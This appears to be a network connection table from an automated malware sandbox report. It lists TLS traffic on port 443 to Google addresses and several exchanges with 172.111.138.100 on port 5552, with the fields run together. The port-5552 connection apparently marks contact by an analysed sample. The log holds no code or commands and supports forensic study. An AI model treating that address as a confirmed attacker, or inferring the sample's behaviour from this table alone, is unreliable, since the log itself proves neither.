                                                                                                                                                        Dec 30, 2024 11:48:24.162909985 CET44350028142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:24.164808989 CET50041443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:24.164845943 CET44350041142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:24.164947987 CET50041443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:24.165142059 CET50041443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:24.165153027 CET44350041142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:24.632956982 CET44350038142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:24.633081913 CET50038443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:24.633730888 CET50038443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:24.633744001 CET44350038142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:24.633913040 CET50038443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:24.633919001 CET44350038142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:24.642184973 CET44350039142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:24.642292976 CET50039443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:24.644107103 CET44350037142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:24.644159079 CET50037443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:24.645070076 CET50039443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:24.645081043 CET44350039142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:24.645440102 CET50039443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:24.645447969 CET44350039142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:24.649518013 CET50037443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:24.649524927 CET44350037142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:24.649671078 CET50037443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:24.649677038 CET44350037142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:24.763973951 CET44350041142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:24.764926910 CET50041443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:24.776088953 CET50041443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:24.776101112 CET44350041142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:24.776556969 CET50041443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:24.776563883 CET44350041142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:24.855315924 CET500465552192.168.2.7172.111.138.100
                                                                                                                                                        Dec 30, 2024 11:48:24.860140085 CET555250046172.111.138.100192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:24.860250950 CET500465552192.168.2.7172.111.138.100
                                                                                                                                                        Dec 30, 2024 11:48:24.860627890 CET500465552192.168.2.7172.111.138.100
                                                                                                                                                        Dec 30, 2024 11:48:24.865417004 CET555250046172.111.138.100192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:25.013673067 CET44350037142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:25.013809919 CET50037443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:25.013849974 CET44350037142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:25.013931990 CET50037443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:25.014029026 CET50037443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:25.014081955 CET44350037142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:25.014213085 CET50037443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:25.014815092 CET50049443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:25.014856100 CET44350049142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:25.015242100 CET50049443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:25.016557932 CET50049443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:25.016571045 CET44350049142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:25.023865938 CET44350039142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:25.023926973 CET44350039142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:25.024019957 CET50039443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:25.024121046 CET50039443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:25.024420023 CET50039443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:25.024435043 CET44350039142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:25.025033951 CET50050443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:25.025049925 CET44350050142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:25.026638985 CET50050443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:25.027009010 CET50050443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:25.027018070 CET44350050142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:25.037314892 CET44350038142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:25.037374020 CET44350038142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:25.037395954 CET50038443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:25.037421942 CET44350038142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:25.037473917 CET44350038142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:25.037493944 CET50038443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:25.038700104 CET50038443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:25.039690018 CET50038443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:25.039711952 CET44350038142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:25.040148973 CET50052443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:25.040168047 CET44350052142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:25.040565968 CET50052443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:25.041080952 CET50052443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:25.041093111 CET44350052142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:25.188416958 CET44350041142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:25.188471079 CET44350041142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:25.188529968 CET50041443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:25.188539028 CET44350041142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:25.188587904 CET44350041142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:25.188621998 CET50041443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:25.188656092 CET50041443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:25.190634012 CET50041443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:25.190649033 CET44350041142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:25.191252947 CET50055443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:25.191317081 CET44350055142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:25.191569090 CET50055443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:25.191569090 CET50055443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:25.191606998 CET44350055142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:25.637039900 CET44350049142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:25.637403011 CET50049443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:25.637537003 CET44350050142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:25.637726068 CET50050443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:25.638201952 CET44350049142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:25.638318062 CET44350050142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:25.638411999 CET50050443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:25.638422966 CET50049443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:25.642951965 CET50049443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:25.642970085 CET44350049142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:25.643250942 CET44350049142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:25.644592047 CET50050443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:25.644602060 CET44350050142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:25.644644022 CET50049443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:25.644870996 CET44350050142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:25.645268917 CET50050443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:25.645895004 CET50050443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:25.645983934 CET50049443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:25.660012960 CET44350052142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:25.661083937 CET50052443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:25.662939072 CET50052443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:25.662939072 CET50052443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:25.662945986 CET44350052142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:25.662961960 CET44350052142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:25.687326908 CET44350050142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:25.691320896 CET44350049142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:25.797955990 CET44350055142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:25.798027039 CET50055443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:26.009478092 CET44350050142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:26.010122061 CET44350050142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:26.010251999 CET50050443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:26.019944906 CET44350049142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:26.020771980 CET50049443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:26.020992994 CET44350049142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:26.021033049 CET44350049142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:26.021213055 CET50049443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:26.075469017 CET44350052142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:26.075519085 CET44350052142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:26.075608015 CET50052443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:26.075625896 CET44350052142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:26.075635910 CET44350052142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:26.075687885 CET50052443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:26.075687885 CET50052443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:26.094391108 CET50055443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:26.094417095 CET44350055142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:26.094640970 CET50055443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:26.094649076 CET44350055142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:26.101015091 CET50049443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:26.101036072 CET50052443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:26.101058006 CET50055443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:26.101106882 CET50050443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:26.103720903 CET50063443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:26.103763103 CET44350063142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:26.103826046 CET50063443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:26.109910011 CET50063443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:26.109922886 CET44350063142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:26.119210005 CET50064443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:26.119241953 CET44350064142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:26.119318962 CET50064443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:26.155937910 CET50064443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:26.155966043 CET44350064142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:26.737559080 CET44350063142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:26.737622023 CET50063443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:26.738116980 CET50063443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:26.738126040 CET44350063142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:26.738404989 CET50063443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:26.738409996 CET44350063142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:26.755022049 CET44350064142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:26.755073071 CET50064443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:26.755512953 CET50064443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:26.755520105 CET44350064142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:26.755705118 CET50064443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:26.755711079 CET44350064142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:26.983232975 CET555250046172.111.138.100192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:26.983294964 CET500465552192.168.2.7172.111.138.100
                                                                                                                                                        Dec 30, 2024 11:48:27.018851995 CET500465552192.168.2.7172.111.138.100
                                                                                                                                                        Dec 30, 2024 11:48:27.023675919 CET555250046172.111.138.100192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:27.108433008 CET44350063142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:27.108515024 CET50063443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:27.108532906 CET44350063142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:27.108747005 CET50063443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:27.109153986 CET50063443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:27.109186888 CET44350063142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:27.109242916 CET50063443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:27.109800100 CET50071443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:27.109848022 CET44350071142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:27.109992981 CET50071443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:27.110157967 CET50072443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:27.110188007 CET44350072142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:27.110352039 CET50072443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:27.111066103 CET50072443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:27.111079931 CET44350072142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:27.111287117 CET50071443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:27.111298084 CET44350071142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:27.126343012 CET44350064142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:27.126403093 CET50064443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:27.126430988 CET44350064142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:27.126502991 CET50064443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:27.126575947 CET50064443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:27.126602888 CET44350064142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:27.126663923 CET50064443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:27.127218008 CET50073443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:27.127260923 CET44350073142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:27.127329111 CET50073443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:27.127490997 CET50074443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:27.127518892 CET44350074142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:27.127718925 CET50074443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:27.127720118 CET50073443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:27.127732992 CET44350073142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:27.127794027 CET50074443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:27.127803087 CET44350074142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:27.710879087 CET44350072142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:27.711021900 CET50072443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:27.711671114 CET44350072142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:27.711971998 CET50072443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:27.715610027 CET50072443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:27.715627909 CET44350072142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:27.715881109 CET44350072142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:27.715949059 CET50072443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:27.717293024 CET50072443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:27.720498085 CET44350071142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:27.720577002 CET50071443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:27.720843077 CET50071443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:27.720854044 CET44350071142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:27.722539902 CET50071443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:27.722546101 CET44350071142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:27.725943089 CET44350074142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:27.726217985 CET50074443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:27.726593018 CET50074443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:27.726598978 CET44350074142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:27.726986885 CET50074443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:27.726993084 CET44350074142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:27.735958099 CET44350073142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:27.736087084 CET50073443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:27.736741066 CET44350073142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:27.736845016 CET50073443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:27.738308907 CET50073443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:27.738320112 CET44350073142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:27.738570929 CET44350073142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:27.738727093 CET50073443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:27.739272118 CET50073443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:27.763329983 CET44350072142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:27.783332109 CET44350073142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:28.079952002 CET44350072142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:28.080059052 CET50072443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:28.080073118 CET44350072142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:28.080223083 CET50072443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:28.080223083 CET50072443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:28.080262899 CET44350072142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:28.080338955 CET50072443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:28.081094980 CET50086443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:28.081127882 CET44350086142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:28.081279993 CET50086443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:28.081762075 CET50086443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:28.081779957 CET44350086142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:28.115736961 CET44350073142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:28.115854025 CET50073443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:28.115932941 CET44350073142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:28.115945101 CET50073443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:28.115983963 CET44350073142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:28.116067886 CET50073443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:28.116067886 CET50073443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:28.116523981 CET50087443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:28.116544008 CET44350087142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:28.116966009 CET50087443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:28.117189884 CET50087443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:28.117198944 CET44350087142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:28.137765884 CET44350071142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:28.137814999 CET44350071142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:28.137904882 CET50071443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:28.137931108 CET44350071142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:28.137943983 CET44350071142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:28.137959957 CET50071443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:28.138060093 CET50071443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:28.138650894 CET50071443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:28.138675928 CET44350071142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:28.139408112 CET50088443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:28.139440060 CET44350088142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:28.140017986 CET50088443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:28.140017986 CET50088443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:28.140044928 CET44350088142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:28.300693035 CET44350074142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:28.300750017 CET44350074142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:28.300766945 CET50074443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:28.300781012 CET44350074142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:28.300823927 CET50074443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:28.300879002 CET44350074142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:28.300906897 CET50074443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:28.301038027 CET50074443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:28.302113056 CET50074443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:28.302128077 CET44350074142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:28.304656982 CET50089443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:28.304713964 CET44350089142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:28.305003881 CET50089443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:28.305371046 CET50089443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:28.305404902 CET44350089142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:28.721486092 CET44350087142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:28.722096920 CET50087443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:28.741499901 CET44350088142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:28.743366003 CET50088443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:28.772041082 CET44350086142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:28.772111893 CET50086443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:28.854149103 CET50087443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:28.854161978 CET44350087142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:28.854356050 CET50087443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:28.854360104 CET44350087142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:28.861990929 CET50088443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:28.861999989 CET44350088142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:28.862118006 CET50088443192.168.2.7142.250.186.161
                                                                                                                                                        Dec 30, 2024 11:48:28.862122059 CET44350088142.250.186.161192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:28.862447977 CET50086443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:28.862461090 CET44350086142.250.185.78192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:28.862626076 CET50086443192.168.2.7142.250.185.78
                                                                                                                                                        Dec 30, 2024 11:48:28.862633944 CET44350086142.250.185.78192.168.2.7
